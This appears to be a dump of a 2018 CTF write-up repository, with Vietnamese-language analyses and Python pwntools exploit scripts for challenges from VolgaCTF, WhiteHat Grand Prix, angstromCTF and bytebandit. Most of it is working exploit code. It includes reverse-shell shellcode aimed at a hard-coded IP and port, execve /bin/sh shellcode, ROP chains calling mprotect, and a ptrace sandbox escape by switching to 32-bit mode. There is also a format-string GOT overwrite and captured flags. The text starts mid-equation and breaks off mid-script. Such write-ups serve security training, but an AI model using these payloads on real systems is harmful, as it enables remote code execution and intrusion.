-3*x_13+-13*x_38+15*x_26+11*x_13+x_23*110*123+2*(-3*x_25+5*x_27)+x_37*x_9*550*x_34-4*70-70-x_31*135*x_37+12*x_11-9*123==498719083, -7*x_20+-3*x_43+x_29-7*x_35+11*x_34-x_39*x_26*18*x_37-4*86+2*123-8*x_27+8*x_15-x_15-x_26*8*x_33-13*x_26==-19729480, x_10*86*182*x_24+x_32*2*x_30-4*x_39-x_39+10*x_32+8*x_17-8*x_30+4*x_34-12*x_29-x_12*55*x_41+123*97*1144*x_17==1381453791, 
9*103+-5*x_34+6*125-11*x_21-14*97-8*67+x_39*1344*97*x_21+5*x_40+15*111-x_27*15*x_26-10*x_13+11*x_16+8*x_17-x_17==1411741755, 13*x_33+x_20+4*(84-x_20)+8*125-125-x_13*90*x_36+6*x_20-4*x_37-x_37+x_11*x_32*20*70-4*x_9-x_9+2*x_29-10*86+x_23*156*x_11==5981100, -7*x_19+7*x_14+13*84+x_42+x_23*4*x_17-2*x_40-13*x_17+9*x_14+14*111-67*39*x_13+6*x_32+4*x_29-x_37+14*x_24==-262868, x_10+x_9*10*x_14+8*125-3*x_13-70*90*x_26-6*x_27+11*111+6*x_27+2*x_24+x_27-x_29-8*x_33-x_33+6*111-13*x_11==-563008, -7*x_24+-11*x_27+-11*x_9+x_12+x_38*70*x_30-10*x_29-2*x_40-6*x_28-x_43*8*84+10*x_25-2*x_12-103*x_43*((x_40*(2**8))-32*x_40)==-267345737, -11*84+13*x_29+13*x_28+x_29+-7*x_20+5*x_16+15*x_10+4*x_41+2*x_17-15*x_18-10*x_30-6*x_24+13*86-48*x_43*x_18-2*70==-586617, 2*x_12+103*225*86-12*x_36-7*103-x_43*12*70-12*x_43-86-97*18*x_29-x_11*x_21*75*108+12*x_12+15*x_25==-31526095) -------------------------------------------------------------------------------- /2018/VolgaCTF/lights/README.md: -------------------------------------------------------------------------------- 1 | Check time delay, you has morse code. 
2 | See [lights.idb](/2018/VolgaCTF/lights/lights.idb) -------------------------------------------------------------------------------- /2018/VolgaCTF/lights/lights.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/VolgaCTF/lights/lights.idb -------------------------------------------------------------------------------- /2018/VolgaCTF/xor_trick/MeePwn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/VolgaCTF/xor_trick/MeePwn.png -------------------------------------------------------------------------------- /2018/VolgaCTF/xor_trick/xor_trick.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | # IPADDR = "\xa7\x58\x72\xd9" # 167.88.114.217 6 | IPADDR = "\x7f\x00\x00\x01" # 127.0.0.1 7 | PORT = "\x7a\x69" # 31337 8 | shellcode = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"+PORT+"\xc7\x44\x24\x04"+IPADDR+"\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" 9 | # http://shell-storm.org/shellcode/files/shellcode-857.php 10 | # Shellcode Author : Russell Willis 11 | 12 | def generate_payload(payload): 13 | result = "" 14 | payload += "\x90"*(0x10-(len(payload)%0x10)) 15 | for i in xrange(0,len(payload),0x10): 16 | a = u64(payload[i:i+8]) 17 | b = u64(payload[i+8:i+16]) 18 | c = (b*(2**64))+a 19 | d = c ^ 0xc5145c1e4210842ac5145c1e4210842a 20 | # pwndbg> x/2gx 
0x7ffff0706c45 21 | # 0x7ffff0706c45 : 0xc5145c1e4210842a 0xc5145c1e4210842a 22 | result += p64(d&0xffffffffffffffff) 23 | result += p64(d>>64) 24 | result = p64(len(result))+result 25 | return result 26 | 27 | if sys.argv[1]=="1": 28 | HOST = '127.0.0.1' 29 | PORT = 45678 30 | else: 31 | HOST = 'xortrick.quals.2018.volgactf.ru' 32 | PORT = 45678 33 | 34 | call_rsp = 0x000000000043781c # Python 3.5.2 3ca82c498bdce94a835bdb0dfd3c644f 35 | 36 | r = remote(HOST,PORT) 37 | filename = "MeePwn.png" # use tweakpng change size 1x1 38 | img = open(filename,"rb").read() 39 | im_file_data = p64(len(img)) 40 | im_file_data += img 41 | r.send(im_file_data) 42 | 43 | payload = p64(call_rsp)*0xa # overwrite return address 44 | payload += shellcode 45 | data1 = generate_payload(payload) 46 | r.send(data1) 47 | 48 | r.interactive() 49 | # VolgaCTF{M@ke_pyth0n_explo1table_ag@in} -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/README.md: -------------------------------------------------------------------------------- 1 | # pwn01 2 | ``` 3 | nc pwn01.grandprix.whitehatvn.com 26129 4 | file: material.grandprix.whitehatvn.com/pwn01 5 | ``` 6 | ## Dịch ngược và tìm lỗi 7 | 8 | Bài cho ta khá nhiều file: 9 | 1. giftshop 10 | 2. ptrace_64 11 | 3. ptrace_64.cpp 12 | 4. blacklist.conf 13 | 5. run.sh 14 | 6. menu.txt 15 | 16 | Đọc run.sh ta thấy chương trình chạy dưới binary ptrace_64 17 | ``` 18 | ./ptrace_64 ./giftshop gift 1 60 50 blacklist.conf 19 | ``` 20 | Đọc source ptrace_64.cpp ta thấy chương trình load vào các tham số: 21 | * ./giftshop: đường dẫn tới binary sẽ thực thi 22 | * gift: binary giftshop sẽ chạy dưới quyền của username gift 23 | * 1: global_cpu_time_limit 24 | * 60: global_real_time_limit 25 | * 50: memLimit 26 | * blacklist.conf: đường dẫn tới file blacklist các syscall. 
27 | 28 | Nội dung file blacklist.conf: 29 | ``` 30 | 7 31 | 56 32 | 57 33 | 58 34 | 59 35 | 62 36 | 200 37 | 234 38 | 1 39 | /home/gift/flag.txt 40 | ``` 41 | 42 | Hiểu nôm na là ptrace_64 sẽ chạy **giftshop** với quyền của user **gift** và trace các syscall để chặn các syscall trong file **blacklist.conf**, ngoài ra ptrace_64 còn chặn sys_open, sys_openat với đường dẫn /home/gift/flag.txt. 43 | 44 | Dò bảng [syscall cho x86_64](http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) ta thấy các syscall bị chặn bao gồm: 45 | * 7: sys_poll 46 | * 56: sys_clone 47 | * 57: sys_fork 48 | * 58: sys_vfork 49 | * 59: sys_execve 50 | * 62: sys_kill 51 | * 200: sys_tkill 52 | * 234: sys_tgkill 53 | * 1: sys_write 54 | 55 | ### Phân tích file giftshop: 56 | checksec ta thấy chương trình có các cờ NX enabled, PIE enabled. 57 | Coi sơ chương trình qua IDA ta dễ dàng nhận thấy chương trình không có hàm _stack_chk_fail và phát hiện lỗi **bufferoverflow** qua hàm ReadStr tại offset 0x1FEC. 58 | ```c 59 | __int64 __fastcall readStr(const char *buff, int size) 60 | { 61 | size_t len; // rdx 62 | __int64 result; // rax 63 | 64 | __isoc99_scanf("%s", buff); 65 | buff[strlen(buff)] = 0; 66 | len = strlen(buff); 67 | result = size; 68 | if ( len > size ) 69 | Quit(); 70 | return result; 71 | } 72 | ``` 73 | Ta có thể bypass check bằng cách nhập null byte để strlen(buff) <= size. 74 | 75 | Hàm main gọi hàm readInt (offset 0x2052) để chọn menu ta thấy hàm sử dụng hàm ReadStr với buff nằm tại stack nên ta có thể thực thi stackoverflow tại đây (do không có _stack_chk_fail) 76 | ```c 77 | __int64 readInt() 78 | { 79 | char nptr; // [rsp+0h] [rbp-10h] 80 | int v2; // [rsp+Ch] [rbp-4h] 81 | 82 | readStr(&nptr, 4); 83 | v2 = atoi(&nptr); 84 | if ( v2 <= 0 || v2 > 256 ) 85 | Quit(); 86 | return v2; 87 | } 88 | ``` 89 | 90 | ## Ý tưởng và giải quyết 91 | Ta thực hiện ghi shellcode vào RECVNAME (offset 0x203120) trên BSS. 
92 | Sau đó ta stackoverflow để ROP về mprotect nhằm tạo quyền cho vùng nhớ BSS có quyền read, write và execute sau đó nhảy về thực thi shellcode trên đó. 93 | 94 | Mục tiêu tiếp theo là viết shellcode làm sao để bypass được ptrace, ta có 1 số ý tưởng: 95 | 1. Sử dụng sys_symlink để bypass sys_open nhưng ý tưởng này thất bại vì ptrace_64.cpp sử dụng hàm realpath để kiểm tra đường dẫn thực sự của file sẽ open. 96 | 2. Sử dụng stub_execveat: có thể thành công vì syscall này không nằm trong danh sách blacklist syscall. 97 | 3. Switch mode sang x86, sau khi switch sẽ bypass được các syscall number bị chặn nhằm thực thi sys_execve("/bin/sh") 98 | 99 | ### Tiến hành thực hiện theo ý tưởng thứ 3: 100 | 101 | Ta thấy các vùng nhớ được cấp phát đều lớn hơn 4 bytes (32 bits) nên ta cần mmap 1 vùng nhớ nhỏ hơn 4 bytes để setup cho các thanh ghi esp và eip của chương trình sau khi thực hiện switch. 102 | Ta thực hiện *mmap(0x40000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)* rồi read shellcode vào đó sau đó thực hiện retf với esp+0x4 là 0x23 (x86) để switch mode và nhảy về vùng chứa shellcode. 
103 | 104 | ### Payload exploit 105 | [giftshop.py](https://github.com/phieulang1993/ctf-writeups/blob/master/2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/giftshop.py) -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/blacklist.conf: -------------------------------------------------------------------------------- 1 | 7 2 | 56 3 | 57 4 | 58 5 | 59 6 | 62 7 | 200 8 | 234 9 | 1 10 | /home/gift/flag.txt 11 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/flag.txt: -------------------------------------------------------------------------------- 1 | flag{concavang} 2 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/giftshop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/giftshop -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/giftshop.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def giftshop(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./giftshop") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | r = process(['./ptrace_64', '/home/phieulang/2018/whitehatgrandprix/forPlayer/giftshop','gift', '1', '60', '50', 'blacklist.conf']) 11 | raw_input("debug?") 12 | elif DEBUG=="3": 13 | HOST = 'pwn01.grandprix.whitehatvn.com' 14 | PORT = 26129 15 | r = remote(HOST,PORT) 16 | 17 | def pause(): 18 | time.sleep(0.05) 19 | 20 | context.arch = "amd64" 21 | r.recvuntil('OK First, here is a giftcard, it may help you in next time you come here !\n') 22 | base = eval(r.recvline())-0x2030D8 
23 | log.info("base: %#x" %base) 24 | r.recvuntil('Can you give me your name plzz ??\n') 25 | r.sendline('\x00') 26 | pause() 27 | r.recvline("Enter the receiver's name plzz: \n") 28 | payload = "\x00"*(0x1e0-0x120) 29 | payload += asm(shellcraft.amd64.linux.read(fd=0, buffer=base+0x2031E0, count=0x500)) 30 | # payload += "\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05" 31 | r.sendline(payload) 32 | pause() 33 | r.recvuntil('Your choice:\n') 34 | 35 | payload = "10" 36 | payload = payload.ljust(0x10, "\x00") 37 | payload += p64(base+0x203e00) # rbp 38 | payload += p64(base+0x225F) # pop rdi; ret 39 | payload += p64(base+0x203000) # rdi 40 | payload += p64(base+0x2261) # pop rsi; ret 41 | payload += p64(0x1000) 42 | payload += p64(base+0x2265) # pop rdx; ret 43 | payload += p64(7) 44 | payload += p64(base+0x2254) # syscall;ret 45 | payload += p64(base+0x2031E0) # shellcode 46 | payload += p64(base+0xB40) 47 | r.sendline(payload) 48 | pause() 49 | 50 | shellcode = '' 51 | shellcode += asm(shellcraft.amd64.linux.syscall('SYS_mmap', 0x40000, 0x2000, 0x7, 0x22, -1, 0)) 52 | shellcode += asm(shellcraft.amd64.linux.read(fd=0, buffer=0x40000, count=0x500)) 53 | shellcode += asm(""" 54 | xor rsp, rsp 55 | mov esp, 0x40500 56 | mov DWORD PTR [esp+4], 0x23 57 | mov DWORD PTR [esp], 0x40000 58 | retf 59 | """) 60 | payload = "\x90"*0x25 61 | payload += shellcode 62 | r.sendline(payload) 63 | pause() 64 | payload = "6a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a0b58cd80".decode("hex") # shellcraft.i386.linux.sh() 65 | pause() 66 | r.sendline(payload) 67 | 68 | r.interactive() 69 | 70 | giftshop(sys.argv[1]) 71 | # WhiteHat{aeb7656b7a397a01c0d9d19fba3a81352e9b21aa} -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/ptrace_64: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/ptrace_64 -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ "$EUID" -ne 0 ] 3 | then echo "Please run as root" 4 | exit 5 | fi 6 | # cd /home/gift 7 | ./ptrace_64 /home/phieulang/2018/whitehatgrandprix/forPlayer/giftshop phieulang 1 60 50 blacklist.conf 8 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/re06/README.md: -------------------------------------------------------------------------------- 1 | # RE06 2 | ``` 3 | material.grandprix.whitehatvn.com/re06 4 | Note: If you find flag in format WhiteHat{abcdef}, you should submit in form WhiteHat{sha1(abcdef)} 5 | ``` 6 | ## Dịch ngược 7 | Chương trình code bằng .NET nên ta sử dụng [Dnspy](https://github.com/0xd4d/dnSpy/) để decompile 8 | 9 | Coi sơ ta thấy một số hàm chính: 10 | ```csharp 11 | private void btn_check_Click(object sender, RoutedEventArgs e) 12 | { 13 | string text = this.tb_key.Text; 14 | string a = MainWindow.Enc(text, 9157, 41117); 15 | bool flag = a == "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAljLGQ="; 16 | if (flag) 17 | { 18 | MessageBox.Show("Correct!! 
You found FLAG"); 19 | } 20 | else 21 | { 22 | MessageBox.Show("Try again!"); 23 | } 24 | } 25 | 26 | public static string Enc(string s, int e, int n) 27 | { 28 | int[] array = new int[s.Length]; 29 | for (int i = 0; i < s.Length; i++) 30 | { 31 | array[i] = (int)s[i]; 32 | } 33 | int[] array2 = new int[array.Length]; 34 | for (int i = 0; i < array.Length; i++) 35 | { 36 | array2[i] = MainWindow.mod(array[i], e, n); 37 | } 38 | string text = ""; 39 | for (int i = 0; i < array.Length; i++) 40 | { 41 | text += (char)array2[i]; 42 | } 43 | return Convert.ToBase64String(Encoding.Unicode.GetBytes(text)); 44 | } 45 | 46 | public static int mod(int m, int e, int n) 47 | { 48 | int[] array = new int[100]; 49 | int num = 0; 50 | do 51 | { 52 | array[num] = e % 2; 53 | num++; 54 | e /= 2; 55 | } 56 | while (e != 0); 57 | int num2 = 1; 58 | for (int i = num - 1; i >= 0; i--) 59 | { 60 | num2 = num2 * num2 % n; 61 | bool flag = array[i] == 1; 62 | if (flag) 63 | { 64 | num2 = num2 * m % n; 65 | } 66 | } 67 | return num2; 68 | } 69 | ``` 70 | 71 | Ta thấy code khá đơn giản, đưa input vào rồi qua hàm xử lí từng kí tự xong ghép lại rồi encode base64 và check với key. 72 | 73 | ## Giải quyết 74 | Có thể ngồi reverse thuật toán rồi viết thuật toán decrypt cái đống base64 sau khi decode nhưng mà bài easy như này mình phải tiết kiệm thời gian cho các bài khó hơn nên mình quyết định bruteforce rồi quăng máy để giải bài khác. 
75 | 76 | ### Code bruteforce 77 | ```csharp 78 | using System; 79 | using System.Collections.Generic; 80 | using System.Linq; 81 | using System.Text; 82 | using System.Threading.Tasks; 83 | 84 | namespace RE06 85 | { 86 | class Program 87 | { 88 | public static int mod(int m, int e, int n) 89 | { 90 | int[] array = new int[100]; 91 | int num = 0; 92 | do 93 | { 94 | array[num] = e % 2; 95 | num++; 96 | e /= 2; 97 | } 98 | while (e != 0); 99 | int num2 = 1; 100 | for (int i = num - 1; i >= 0; i--) 101 | { 102 | num2 = num2 * num2 % n; 103 | bool flag = array[i] == 1; 104 | if (flag) 105 | { 106 | num2 = num2 * m % n; 107 | } 108 | } 109 | return num2; 110 | } 111 | public static string Enc(string s, int e, int n) 112 | { 113 | int[] array = new int[s.Length]; 114 | for (int i = 0; i < s.Length; i++) 115 | { 116 | array[i] = (int)s[i]; 117 | } 118 | int[] array2 = new int[array.Length]; 119 | for (int i = 0; i < array.Length; i++) 120 | { 121 | array2[i] = mod(array[i], e, n); 122 | } 123 | string text = ""; 124 | for (int i = 0; i < array.Length; i++) 125 | { 126 | text += (char)array2[i]; 127 | } 128 | return Convert.ToBase64String(Encoding.Unicode.GetBytes(text)); 129 | } 130 | public static string check() 131 | { 132 | string encoded; 133 | string key = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAlj"; 134 | string flag = ""; 135 | bool found; 136 | while (true) 137 | { 138 | found = false; 139 | for (int i = 32; i < 128; i++) 140 | { 141 | for (int i2 = 32; i2 < 128; i2++) 142 | { 143 | for (int i3 = 32; i3 < 128; i3++) 144 | { 145 | encoded = Enc(flag + (char)i + (char)i2 + (char)i3, 9157, 41117).Replace("=", ""); 146 | if (encoded == key) 147 | { 148 | flag = flag + (char)i + (char)i2 + (char)i3; 149 | Console.WriteLine("Flag: {0}", flag); 150 | return flag; 151 | } 152 | if (encoded == key.Substring(0, encoded.Length)) 153 | { 154 | flag = flag + (char)i + (char)i2 + (char)i3; 155 | 
Console.WriteLine("Flag: {0}", flag); 156 | found = true; 157 | break; 158 | } 159 | } 160 | } 161 | if (found) 162 | { 163 | break; 164 | } 165 | } 166 | } 167 | } 168 | static void Main(string[] args) 169 | { 170 | string key = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAlj"; 171 | string encoded; 172 | string flag = check(); 173 | while (true) 174 | { 175 | for (int i = 32; i < 128; i++) 176 | { 177 | encoded = Enc(flag + (char)i, 9157, 41117); 178 | if (encoded == key + "LGQ=") 179 | { 180 | flag = flag + (char)i; 181 | Console.WriteLine("Final Flag: {0}", flag); 182 | Console.ReadLine(); 183 | } 184 | } 185 | Console.WriteLine("Not found!"); 186 | break; 187 | 188 | } 189 | 190 | } 191 | } 192 | } 193 | ``` 194 | ### Kết quả: 195 | ![alt text](https://raw.githubusercontent.com/phieulang1993/ctf-writeups/master/2018/WhiteHatGrandPrix2018quals/re06/result.png "Kết quả") 196 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/re06/re06.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace RE06 8 | { 9 | class Program 10 | { 11 | public static int mod(int m, int e, int n) 12 | { 13 | int[] array = new int[100]; 14 | int num = 0; 15 | do 16 | { 17 | array[num] = e % 2; 18 | num++; 19 | e /= 2; 20 | } 21 | while (e != 0); 22 | int num2 = 1; 23 | for (int i = num - 1; i >= 0; i--) 24 | { 25 | num2 = num2 * num2 % n; 26 | bool flag = array[i] == 1; 27 | if (flag) 28 | { 29 | num2 = num2 * m % n; 30 | } 31 | } 32 | return num2; 33 | } 34 | public static string Enc(string s, int e, int n) 35 | { 36 | int[] array = new int[s.Length]; 37 | for (int i = 0; i < s.Length; i++) 38 | { 39 | array[i] = (int)s[i]; 40 | } 41 | int[] array2 = new int[array.Length]; 42 | 
for (int i = 0; i < array.Length; i++) 43 | { 44 | array2[i] = mod(array[i], e, n); 45 | } 46 | string text = ""; 47 | for (int i = 0; i < array.Length; i++) 48 | { 49 | text += (char)array2[i]; 50 | } 51 | return Convert.ToBase64String(Encoding.Unicode.GetBytes(text)); 52 | } 53 | public static string check() 54 | { 55 | string encoded; 56 | string key = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAlj"; 57 | string flag = ""; 58 | bool found; 59 | while (true) 60 | { 61 | found = false; 62 | for (int i = 32; i < 128; i++) 63 | { 64 | for (int i2 = 32; i2 < 128; i2++) 65 | { 66 | for (int i3 = 32; i3 < 128; i3++) 67 | { 68 | encoded = Enc(flag + (char)i + (char)i2 + (char)i3, 9157, 41117).Replace("=", ""); 69 | if (encoded == key) 70 | { 71 | flag = flag + (char)i + (char)i2 + (char)i3; 72 | Console.WriteLine("Flag: {0}", flag); 73 | return flag; 74 | } 75 | if (encoded == key.Substring(0, encoded.Length)) 76 | { 77 | flag = flag + (char)i + (char)i2 + (char)i3; 78 | Console.WriteLine("Flag: {0}", flag); 79 | found = true; 80 | break; 81 | } 82 | } 83 | } 84 | if (found) 85 | { 86 | break; 87 | } 88 | } 89 | } 90 | } 91 | static void Main(string[] args) 92 | { 93 | string key = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAlj"; 94 | string encoded; 95 | string flag = check(); 96 | while (true) 97 | { 98 | for (int i = 32; i < 128; i++) 99 | { 100 | encoded = Enc(flag + (char)i, 9157, 41117); 101 | if (encoded == key + "LGQ=") 102 | { 103 | flag = flag + (char)i; 104 | Console.WriteLine("Final Flag: {0}", flag); 105 | Console.ReadLine(); 106 | } 107 | } 108 | Console.WriteLine("Not found!"); 109 | break; 110 | 111 | } 112 | 113 | } 114 | } 115 | } 116 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/re06/result.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/WhiteHatGrandPrix2018quals/re06/result.png -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/re06/reverse.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/WhiteHatGrandPrix2018quals/re06/reverse.exe -------------------------------------------------------------------------------- /2018/angstromCTF/hellcode/hellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/angstromCTF/hellcode/hellcode -------------------------------------------------------------------------------- /2018/angstromCTF/hellcode/hellcode.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | def hellcode(DEBUG): 5 | code_runner = 0x400996 6 | offset_mprotect = 0x0000000000101770 7 | offset_system = 0x0000000000045390 8 | offset_str_bin_sh = 0x18cd57 9 | 10 | if DEBUG=="1": 11 | t = 0.005 12 | r = process("./hellcode") 13 | raw_input("debug?") 14 | elif DEBUG=="2": 15 | s = ssh(host='shell.angstromctf.com', user='teamXXXX', password='XXXXX') 16 | r = s.process('/problems/hellcode/hellcode') 17 | 18 | def a(s): 19 | return asm(s, arch = "amd64", os = 'linux') 20 | 21 | def stage1(): 22 | # save r14 = mprotect+7 23 | # r15 = code_runner 24 | # return code_runner 25 | log.info('stage 1') 26 | r.recvuntil("Please enter your code: ") 27 | payload = a('pop rbx') 28 | payload += a('sub bx, %d' % (0x400B47 - code_runner)) # 0x400996 (code_runner) 29 | payload += a('push rcx') 30 | payload += 
a('pop r14') # r14 = mprotect+7 31 | payload += a('push rbx') 32 | payload += a('push rbx') 33 | payload += a('pop r15') # r15 = 0x400996 (code_runner) 34 | payload += "\x90"*(0x10-len(payload)) 35 | r.send(payload) 36 | 37 | def stage2(): 38 | # change r14 from mprotect+7 to system 39 | # r13 = system 40 | # return code_runner 41 | log.info('stage 2') 42 | r.recvuntil("Please enter your code: ") 43 | payload = a('pop rax') # trash 44 | payload += a('push r15') # code_runner 45 | payload += a('sub r14, %d' % (offset_mprotect+7 - offset_system)) # r14 = system 46 | payload += a('push r14') 47 | payload += a('pop r13') # r13 = system 48 | payload += "\x90"*(0x10-len(payload)) 49 | r.send(payload) 50 | 51 | def stage3(): 52 | # change r13 to /bin/sh 53 | # return system (r14) 54 | log.info('stage 3') 55 | r.recvuntil("Please enter your code: ") 56 | payload = '' 57 | payload += a('add r13, %d' % (offset_str_bin_sh - offset_system)) # r13 = /bin/sh 58 | payload += a('push r13') 59 | payload += a('pop rdi') # rdi = /bin/sh 60 | payload += a('push r14') # system 61 | payload += "\x90"*(0x10-len(payload)) 62 | r.send(payload) 63 | 64 | def leak(): 65 | puts_plt = 0x4007A0 66 | libc_start_main_got = 0x602048 67 | r.recvuntil("Please enter your code: ") 68 | payload = a('pop rbx') 69 | payload += a('sub bx, 0xd9') 70 | payload += a('push rbx') 71 | payload += a('mov rdi, 0x602048') 72 | payload += "\x90"*(0x10-len(payload)) 73 | r.send(payload) 74 | res = r.recv(6) 75 | print hex(u64(res.ljust(8,"\x00"))) # same local 76 | 77 | 78 | stage1() 79 | stage2() 80 | stage3() 81 | # leak() 82 | 83 | r.interactive() 84 | 85 | hellcode(sys.argv[1]) 86 | -------------------------------------------------------------------------------- /2018/angstromCTF/letter/letter.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def personal_letter32(DEBUG): 6 | 7 | if DEBUG=="1": 8 | t = 0.005 9 | r = 
process("./personal_letter32") 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | s = ssh(host='shell.angstromctf.com', user='teamXXXX', password='XXXXXXX') 13 | s.set_working_directory('/problems/letter') 14 | r = s.process('./personal_letter32') 15 | printFlag = 0x0804872B 16 | exit_got = 0x804A030 17 | offset = 26 18 | r.recvuntil("Enter Name (100 Chars max): ") 19 | payload = p32(exit_got) 20 | payload += "%"+str((printFlag&0xffff)-12)+"u"+"%26$hn" 21 | r.sendline(payload) 22 | 23 | r.interactive() 24 | 25 | personal_letter32(sys.argv[1]) 26 | # Here's a flag: actf{flags_are_fun} -------------------------------------------------------------------------------- /2018/angstromCTF/letter/personal_letter32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/angstromCTF/letter/personal_letter32 -------------------------------------------------------------------------------- /2018/bytebandit/ROP_Crazy/gg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/bytebandit/ROP_Crazy/gg -------------------------------------------------------------------------------- /2018/bytebandit/ROP_Crazy/ropcrazy.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def gg(DEBUG): 6 | context.arch = "amd64" 7 | t = 0.3 8 | 9 | def a(s): 10 | return asm(s, arch = "amd64", os = "linux") 11 | 12 | if DEBUG=="1": 13 | t = 0.005 14 | r = process("./gg") 15 | raw_input("debug?") 16 | elif DEBUG=="2": 17 | HOST = '34.218.199.37' 18 | PORT = 5000 19 | r = remote(HOST,PORT) 20 | 21 | shellcode = a(shellcraft.amd64.linux.sh()) 22 | res = r.recv(len("0x7ffff7ff6000")) 23 | r.recv(0x1000) 24 | shelladdr = int(res,16) 25 | log.info('shell: 
%#x' % shelladdr) 26 | payload = p64(shelladdr) 27 | r.send(payload) 28 | payload_readmore = a("""pop rax 29 | sub rax, 0x15 30 | push rax 31 | push rax 32 | pop rdx 33 | """) 34 | payload_readmore = payload_readmore.ljust(8,"\x90") 35 | r.send(payload_readmore) 36 | 37 | r.sendline(shellcode) # 0x400837 call _read 38 | r.interactive() 39 | 40 | gg(sys.argv[1]) 41 | """ 42 | id 43 | uid=1000(pwn) gid=1000(pwn) groups=1000(pwn) 44 | $ ls 45 | flag.txt 46 | gg 47 | $ cat f* 48 | flag{woah_those_must_have_been_some_good_rets} 49 | $ 50 | """ -------------------------------------------------------------------------------- /2018/bytebandit/twisted/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/bytebandit/twisted/libc.so.6 -------------------------------------------------------------------------------- /2018/bytebandit/twisted/twisted.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def twisted(DEBUG): 6 | t = 0.3 7 | offset_system = 0x3a940 8 | 